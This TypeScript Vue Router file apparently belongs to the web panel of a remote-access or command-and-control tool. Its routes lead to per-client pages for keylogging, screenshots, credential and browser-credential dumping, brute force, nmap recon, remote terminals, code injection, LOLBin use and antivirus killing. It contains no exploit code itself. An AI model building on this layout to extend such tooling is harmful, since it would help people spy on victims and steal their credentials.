import type { RouteRecordRaw } from "vue-router";
import ClientList from "@/views/ClientList.vue";
import ClientDetail from "@/views/ClientDetail.vue";
import ClientInfo from "@/components/ClientDetail/ClientInfo.vue";
import ClientFunctionIndex from "@/views/ClientFunctionIndex.vue";
import ExplorerList from "@/components/ClientDetail/ExplorerV2/ExplorerList.vue";
import ScanHistoryFull from "@/components/ClientDetail/ExplorerV2/ScanHistoryFull.vue";
import ScanHistoryDetail from "@/components/ClientDetail/ExplorerV2/ScanHistoryDetail.vue";
import HistoryProcessScan from "@/components/ClientDetail/Process/HistoryProcessScan.vue";
import ProcessList from "@/components/ClientDetail/Process/ProcessList.vue";
import HistoryAppInstalledScan from "@/components/ClientDetail/AppInstalled/HistoryAppInstalledScan.vue";
import AppInstalledList from "@/components/ClientDetail/AppInstalled/AppInstalledList.vue";
import HistoryOpenPortScan from "@/components/ClientDetail/OpenPort/HistoryOpenPortScan.vue";
import OpenPortList from "@/components/ClientDetail/OpenPort/OpenPortList.vue";
import GatheringAndSpreading from "@/components/ClientDetail/Gathering/GatheringAndSpreading.vue";
import HistoryReconScan from "@/components/ClientDetail/Recon/HistoryReconScan.vue";
import ReconList from "@/components/ClientDetail/Recon/ReconList.vue";
import HistoryBruteForceScan from "@/components/ClientDetail/BruteForce/HistoryBruteForceScan.vue";
import BruteForceDetail from "@/components/ClientDetail/BruteForce/BruteForceDetail.vue";
import HistoryNmapScan from "@/components/ClientDetail/nmap/HistoryNmapScan.vue";
import NetworkTopology from "@/components/ClientDetail/nmap/NetworkTopology.vue";
import KeyloggerHistory from "@/components/ClientDetail/Keylogger/KeyloggerHistory.vue";
import ScreenshotHistory from "@/components/ClientDetail/Screenshot/ScreenshotHistory.vue";
import BrowserHistoryScan from "@/components/ClientDetail/BrowserHistory/BrowserHistoryScan.vue";
import BrowserHistoryList from "@/components/ClientDetail/BrowserHistory/BrowserHistoryList.vue";
import CommandLine from "@/components/ClientDetail/Cmd/CommandLine.vue";
import ChatHistory from "@/components/ClientDetail/ChatHistory/ChatHistory.vue";
import LastActivityActions from "@/components/ClientDetail/LastActivity/LastActivityActions.vue";
import LastActivityList from "@/components/ClientDetail/LastActivity/LastActivityList.vue";
import DumpCredential from "@/components/ClientDetail/DumpCredential/DumpCredential.vue";
import DumpCredentialDetail from "@/components/ClientDetail/DumpCredential/DumpCredentialDetail.vue";
import BrowserCredentialDetail from "@/components/ClientDetail/DumpCredential/BrowserCredentialDetail.vue";
import RecordList from "@/components/ClientDetail/Record/RecordList.vue";
import ClientSetting from "@/components/ClientDetail/Setting/ClientSetting.vue";
import TerminalPage from "@/components/ClientDetail/Terminal/TerminalPage.vue";
import InjectHistory from "@/views/InjectHistory.vue";
import InjectTab from "@/views/InjectTab.vue";
import FindDmlPage from "@/components/ClientDetail/FindDML/FindDmlPage.vue";
import LolBinPage from "@/components/ClientDetail/LolBin/LolBinPage.vue";
import KillAvPage from "@/components/ClientDetail/KillAV/KillAvPage.vue";
import { set_default_pagination } from "./util";

export const client_routes: RouteRecordRaw = {
  path: "/client",
  children: [
    {
      path: "/client",
      component: ClientList,
      name: "ClientList",
      beforeEnter: set_default_pagination,
    },
    {
      path: "/client/:client_id",
      component: ClientDetail,
      name: "ClientDetail",
      children: [
        {
          path: "info",
          component: ClientInfo,
          name: "ClientInfo",
        },
        {
          path: "functions",
          component: ClientFunctionIndex,
          name: "ClientFunctions",
        },
        {
          path: "explorer",
          name: "ClientExplorer",
          component: ExplorerList,
          beforeEnter: set_default_pagination,
        },
        {
          path: "explorer-history",
          children: [
            {
              path: "",
              name: "ClientExplorerScanHistory",
              component: ScanHistoryFull,
            },
            {
              path: ":action_id",
              name: "ClientExplorerScanHistoryDetail",
              component: ScanHistoryDetail,
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "process",
          children: [
            {
              path: "",
              name: "ClientProcess",
              component: HistoryProcessScan,
            },
            {
              path: ":action_id",
              component: ProcessList,
              name: "ClientProcessScanDetail",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "application",
          children: [
            {
              path: "",
              name: "ClientApplication",
              component: HistoryAppInstalledScan,
            },
            {
              path: ":action_id",
              component: AppInstalledList,
              name: "ClientApplicationScanDetail",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "opened_port",
          children: [
            {
              path: "",
              name: "ClientOpenedPort",
              component: HistoryOpenPortScan,
            },
            {
              path: ":action_id",
              component: OpenPortList,
              name: "ClientOpenedPortScanDetail",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "gathering",
          name: "ClientGathering",
          component: GatheringAndSpreading,
          redirect: (to) => ({
            name: "ClientRecon",
            params: to.params,
          }),
          children: [
            {
              path: "recon",
              component: HistoryReconScan,
              name: "ClientRecon",
            },
            {
              path: "recon/:action_id",
              component: ReconList,
              name: "ClientReconScanDetail",
              beforeEnter: set_default_pagination,
            },
            {
              path: "bruteforce",
              component: HistoryBruteForceScan,
              name: "ClientBruteForce",
            },
            {
              path: "bruteforce/:action_id",
              component: BruteForceDetail,
              name: "ClientBruteForceScanDetail",
              beforeEnter: set_default_pagination,
            },
            {
              path: "nmap",
              component: HistoryNmapScan,
              name: "ClientNmap",
            },
            {
              path: "nmap/:action_id",
              component: NetworkTopology,
              name: "ClientNmapScanDetail",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "keylogger",
          component: KeyloggerHistory,
          name: "ClientKeylogger",
          beforeEnter: set_default_pagination,
        },
        {
          path: "screenshot",
          component: ScreenshotHistory,
          name: "ClientScreenshot",
          beforeEnter: set_default_pagination,
        },
        {
          path: "browser_history",
          children: [
            {
              path: "",
              component: BrowserHistoryScan,
              name: "ClientBrowserHistory",
            },
            {
              path: ":action_id",
              component: BrowserHistoryList,
              name: "ClientBrowserHistoryScanDetail",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "command",
          component: CommandLine,
          name: "ClientCommand",
          beforeEnter: set_default_pagination,
        },
        {
          path: "chat_history",
          children: [
            {
              path: "",
              name: "ClientChatHistoryDefault",
              redirect: (from) => ({
                name: "ClientChatHistory",
                params: {
                  ...from.params,
                  chat_type: "zalo-web",
                },
              }),
            },
            {
              path: ":chat_type",
              component: ChatHistory,
              name: "ClientChatHistory",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "last_activity",
          children: [
            {
              path: "",
              name: "ClientLastActivity",
              component: LastActivityActions,
            },
            {
              path: ":action_id",
              component: LastActivityList,
              name: "ClientLastActivityScanDetail",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "dump-credential",
          children: [
            {
              path: "",
              name: "ClientDumpCredential",
              component: DumpCredential,
            },
            {
              path: ":action_id",
              component: DumpCredentialDetail,
              name: "ClientDumpCredentialDetail",
              beforeEnter: set_default_pagination,
            },
          ],
        },
        {
          path: "browser-credential",
          component: BrowserCredentialDetail,
          name: "ClientBrowserCredential",
          beforeEnter: set_default_pagination,
        },
        {
          path: "record",
          component: RecordList,
          name: "ClientRecord",
          beforeEnter: set_default_pagination,
        },
        {
          path: "setting",
          component: ClientSetting,
          name: "ClientSetting",
          beforeEnter: set_default_pagination,
        },
        {
          path: "terminal",
          component: TerminalPage,
          name: "ClientTerminal",
        },
        {
          path: "inject",
          component: InjectHistory,
          name: "ClientInject",
        },
        {
          path: "inject/create",
          component: InjectTab,
          name: "ClientInjectCreate",
        },
        {
          path: "find-dml",
          component: FindDmlPage,
          name: "ClientFindDML",
        },
        {
          path: "lol-bin",
          component: LolBinPage,
          name: "ClientLolBin",
          beforeEnter: set_default_pagination,
        },
        {
          path: "kill-av",
          component: KillAvPage,
          name: "ClientKillAV",
          beforeEnter: set_default_pagination,
        },
      ],
    },
  ],
};